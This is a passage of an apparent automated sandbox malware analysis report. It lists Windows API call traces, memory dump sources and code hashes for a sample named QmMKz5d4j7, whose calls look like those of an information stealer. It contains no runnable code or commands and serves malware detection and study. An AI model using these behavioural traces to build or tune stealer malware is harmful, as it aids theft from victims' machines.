                                      • lstrcpyn.KERNEL32(0064AB88,006BF630,006BF630,?,0041140C,?,006BF630), ref: 00419290
                                      • lstrlenA.KERNEL32(?,?,0041140C,?,006BF630), ref: 004192A7
                                      • wsprintfA.USER32 ref: 004192C7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction ID: a59194731e19cd62a1114d9db51b1d7a77f87ed08144ed5303bdb74f02b8d175
                                      • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                      • Instruction Fuzzy Hash: FD010879580108FFCB04DFECC998EAE7BBAEB49394F108548F9098B300C635AA40DB95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                      • HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                      • RegCloseKey.ADVAPI32(?), ref: 004012FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3466090806-0
                                      • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction ID: a780f69aac564b2d92452564e57f3177c1920ebdf93c56c18a8360c70aaf8c3d
                                      • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction Fuzzy Hash: 000131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA05A7280D6749A018F51
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022D151B
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 022D1522
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022D153E
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022D155C
                                      • RegCloseKey.ADVAPI32(?), ref: 022D1566
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction ID: 63084d8a319a27892082af4f4125e024ba0b0ff5d856c36659a97c20f700532c
                                      • Opcode Fuzzy Hash: fa554e1047db5fd5a59fe71b1bc1fc144662bff3d722b2db7a38c4cdc39b2b47
                                      • Instruction Fuzzy Hash: A50131BDA40208BFDB10DFE0DC49FAEB7BDEB48701F008159FA0597280D6749A018F91
                                      APIs
                                      • __getptd.LIBCMT ref: 0041C74E
                                        • Part of subcall function 0041BF9F: __getptd_noexit.LIBCMT ref: 0041BFA2
                                        • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                                      • __getptd.LIBCMT ref: 0041C765
                                      • __amsg_exit.LIBCMT ref: 0041C773
                                      • __lock.LIBCMT ref: 0041C783
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                      • Instruction ID: 4c6ecd523783b942696bdc62fd612c852c6eee159b5b032e672b771ca3e86784
                                      • Opcode Fuzzy Hash: 97b8e5648014eb75fe7e4c2f5c52bbac28816c25018f37e92348e0e4551f1163
                                      • Instruction Fuzzy Hash: B0F09632A813119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D28E9E
                                      APIs
                                      • __getptd.LIBCMT ref: 022EC9B5
                                        • Part of subcall function 022EC206: __getptd_noexit.LIBCMT ref: 022EC209
                                        • Part of subcall function 022EC206: __amsg_exit.LIBCMT ref: 022EC216
                                      • __getptd.LIBCMT ref: 022EC9CC
                                      • __amsg_exit.LIBCMT ref: 022EC9DA
                                      • __lock.LIBCMT ref: 022EC9EA
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 022EC9FE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                      • Instruction ID: c7d4657104b6a573818c3436915559dddaa834fa843ce52a85352d05b71a7e59
                                      • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                      • Instruction Fuzzy Hash: 20F096329603119FDF30BBE8550276D3391AF14728FD0410BD417A71D8DBA45540FF5A
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,0068FE20), ref: 0041079A
                                      • StrCmpCA.SHLWAPI(00000000,0068FF80), ref: 00410866
                                      • StrCmpCA.SHLWAPI(00000000,0068FE30), ref: 0041099D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: `_A
                                      • API String ID: 3722407311-2339250863
                                      • Opcode ID: 8a35012189f66fda1be3007d90ae9ffade8581afc9871c19ab20889a1dda6df3
                                      • Instruction ID: 94d948ae3f98129d28702617e668470e7ead908e0178ded6cd69974dbc9b1d9a
                                      • Opcode Fuzzy Hash: 8a35012189f66fda1be3007d90ae9ffade8581afc9871c19ab20889a1dda6df3
                                      • Instruction Fuzzy Hash: 3991C975A101089FCB28EF65D991BED77B5FF94304F40852EE8099F281DB349B46CB86
                                      APIs
                                      • StrCmpCA.SHLWAPI(00000000,0068FE20), ref: 0041079A
                                      • StrCmpCA.SHLWAPI(00000000,0068FF80), ref: 00410866
                                      • StrCmpCA.SHLWAPI(00000000,0068FE30), ref: 0041099D
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy
                                      • String ID: `_A
                                      • API String ID: 3722407311-2339250863
                                      • Opcode ID: 421f53d52a56a2bbd4cfe63d0fddeb81e19441a4c74e856354e2cedb9b6df6a4
                                      • Instruction ID: eaeb4c1bfeb24d12610814888c89f1e8d39eb2be5be33b2b9933dc38047eb686
                                      • Opcode Fuzzy Hash: 421f53d52a56a2bbd4cfe63d0fddeb81e19441a4c74e856354e2cedb9b6df6a4
                                      • Instruction Fuzzy Hash: 6081BA75B101049FCB18EF65C991AEDB7B6FF94304F50852EE8099F281DB349B46CB86
                                      APIs
                                      • GetEnvironmentVariableA.KERNEL32(00690050,0064B390,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,00410153), ref: 0040A0BD
                                      • LoadLibraryA.KERNEL32(006C0260,?,?,?,?,?,?,?,?,?,?,?,00410153), ref: 0040A146
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00690100,?,0042110C,?,00000000), ref: 0041A82B
                                        • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • SetEnvironmentVariableA.KERNEL32(00690050,00000000,00000000,?,004212D8,?,00410153,0064B390,00420AFE), ref: 0040A132
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                      • String ID: k
                                      • API String ID: 2929475105-2690311395
                                      • Opcode ID: 3e5c2e7f3c52295296a9dd7af1058fae292f2bf88b383b88a2919d02ed60847a
                                      • Instruction ID: 8fd865f7776555e91364b6e3317f0d6dd22ba45ac697d56d5a10bd23e480980a
                                      • Opcode Fuzzy Hash: 3e5c2e7f3c52295296a9dd7af1058fae292f2bf88b383b88a2919d02ed60847a
                                      • Instruction Fuzzy Hash: F9418DB9941204BFCB04EFE5ED45BEA33B6BB0A305F05112EF405A32A0DB385985CB67
                                      APIs
                                      • GetEnvironmentVariableA.KERNEL32(0064A0B4,0064B390,0000FFFF), ref: 022DA324
                                      • LoadLibraryA.KERNEL32(0064A578), ref: 022DA3AD
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAA87: lstrlen.KERNEL32(022D516C,?,?,022D516C,00420DDE), ref: 022EAA92
                                        • Part of subcall function 022EAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022EAAEC
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      • SetEnvironmentVariableA.KERNEL32(0064A0B4,00000000,00000000,?,004212D8,?,?,0064B390,00420AFE), ref: 022DA399
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                      • String ID: k
                                      • API String ID: 2929475105-2690311395
                                      • Opcode ID: 6027c5fd171335b18c1cc3c543ab76e1658be5b37c2198500408d77f0a97119a
                                      • Instruction ID: 4f64e36f3fd45887349381083a48bebd5b1e7ef5e1116ae2fd4416101536c873
                                      • Opcode Fuzzy Hash: 6027c5fd171335b18c1cc3c543ab76e1658be5b37c2198500408d77f0a97119a
                                      • Instruction Fuzzy Hash: ED4190799A0304FFCB04DFE4ED88EAE73B7AB46304F491119E406932A4DB745944DF12
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416663
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00416726
                                      • ExitProcess.KERNEL32 ref: 00416755
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 2a48c5a59bf04772f1499e72b063be6b9ba0683c558070b8fd468f5775b2de20
                                      • Instruction ID: 5b5f5c47f0bfa9475b258acd8296b8f4f2330d650783268263d73b7fdd640aa3
                                      • Opcode Fuzzy Hash: 2a48c5a59bf04772f1499e72b063be6b9ba0683c558070b8fd468f5775b2de20
                                      • Instruction Fuzzy Hash: 7F314AB1C01208ABDB14EB91DD82FDEB778AF04314F40518EF20966191DF786B89CF6A
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 022E68CA
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 022E698D
                                      • ExitProcess.KERNEL32 ref: 022E69BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2247593788.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_22d0000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                      • String ID: <
                                      • API String ID: 1148417306-4251816714
                                      • Opcode ID: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                      • Instruction ID: e6fa43c86ec8a3706e9b48f3db0c3aa47226030db677f92b72f282516cf51e06
                                      • Opcode Fuzzy Hash: 4ae30b859fc942c9587f152936d11ec8aa2d9d08854ccb4cb357e31b47128d92
                                      • Instruction Fuzzy Hash: AB3149B1911308ABDB14EFD0DD85FEEB77AAF54300F805189E206A6194DF746B88CF69
                                      APIs
                                      • VirtualProtect.KERNEL32(?,?,@Jn@,@Jn@), ref: 00406C9F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID: @Jn@$Jn@$Jn@
                                      • API String ID: 544645111-1180188686
                                      • Opcode ID: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                      • Instruction ID: b746c2a28f05bbd6b1460d210bf7098c9bc173f160aa6dfc6dfdc57a011f18e7
                                      • Opcode Fuzzy Hash: caf630da144662436c325b164354e3ce96217d6286d52214ffa948e93cb1361e
                                      • Instruction Fuzzy Hash: FA213374E04208EFEB04CF84C544BAEBBB5FF48304F1181AAD54AAB381D3399A91DF85
                                      APIs
                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                      • lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcatlstrcpy
                                      • String ID: vI@$vI@
                                      • API String ID: 3905823039-1245421781
                                      • Opcode ID: 960abf7006d12b6f710217112a9391fe63a00ea67513b785fcadcd8b356096d2
                                      • Instruction ID: 271a46469eabd2290b2e3c410fce444a88fb87627d9bf606efbbe474ae7d75ee
                                      • Opcode Fuzzy Hash: 960abf7006d12b6f710217112a9391fe63a00ea67513b785fcadcd8b356096d2
                                      • Instruction Fuzzy Hash: F011E878901108EFCB05EF94D885AEEB3B5FF49314F108599E825AB391C734AE92CF95
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                      • HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                      • wsprintfW.USER32 ref: 00418D78
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocProcesswsprintf
                                      • String ID: %hs
                                      • API String ID: 659108358-2783943728
                                      • Opcode ID: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                      • Instruction ID: e0c39cc4b97fe4de81499882959c588a1d03a161ade5b5bfa375175f6a3fb920
                                      • Opcode Fuzzy Hash: 308207b7b7d6c7c9756ec14eecfab78ddd1d2e288a316a00ead5d509718cb0e2
                                      • Instruction Fuzzy Hash: 96E08CB8A80208BFC710DBD4EC0AE697BB8EB05702F000194FE0A87280DA719E008B96
                                      APIs
                                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                        • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00689760,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A2E1
                                      • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A3FF
                                      • lstrlenA.KERNEL32(00000000), ref: 0040A6BC
                                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                        • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                      • DeleteFileA.KERNEL32(00000000), ref: 0040A743
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2246793167.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2246793167.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2246793167.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_QmMKz5d4j7.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTimememcmp
                                      • String ID:
                                      • API String ID: 257331557-0
                                      • Opcode ID: 5c6ea0800f3a75e7701329c3f3b397dedec4f654ee2fbde65a9872b6ed8edf98
                                      • Instruction ID: ddd88d02e0d3355bf8470c19a8c4de6788c323a7c51f3fd4630425147b47cfd6
                                      • Opcode Fuzzy Hash: 5c6ea0800f3a75e7701329c3f3b397dedec4f654ee2fbde65a9872b6ed8edf98
                                      • Instruction Fuzzy Hash: 85E134728111089ACB04FBA5DD91EEE733CAF14314F50815EF51672091EF386A9ECB7A
                                      APIs
                                        • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                        • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                        • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                        • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                        • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                        • Part of subcall function 022E8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022D1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022E8DED
                                        • Part of subcall function 022EAB87: lstrcpy.KERNEL32(00000000,?), ref: 022EABD9
                                        • Part of subcall function 022EAB87: lstrcat.KERNEL32(00000000), ref: 022EABE9
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022DA548
                                      • lstrlen.KERNEL32(00000000,00000000), ref: 022DA666
                                      • lstrlen.KERNEL32(00000000), ref: 022DA923
                                        • Part of subcall function 022EAA07: lstrcpy.KERNEL32(?,00000000), ref: 022EAA4D
                                        • Part of subcall function 022DA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022DA094
                                      • DeleteFileA.KERNEL32(00000000), ref: 022DA9AA
                                      Memory Dump Source
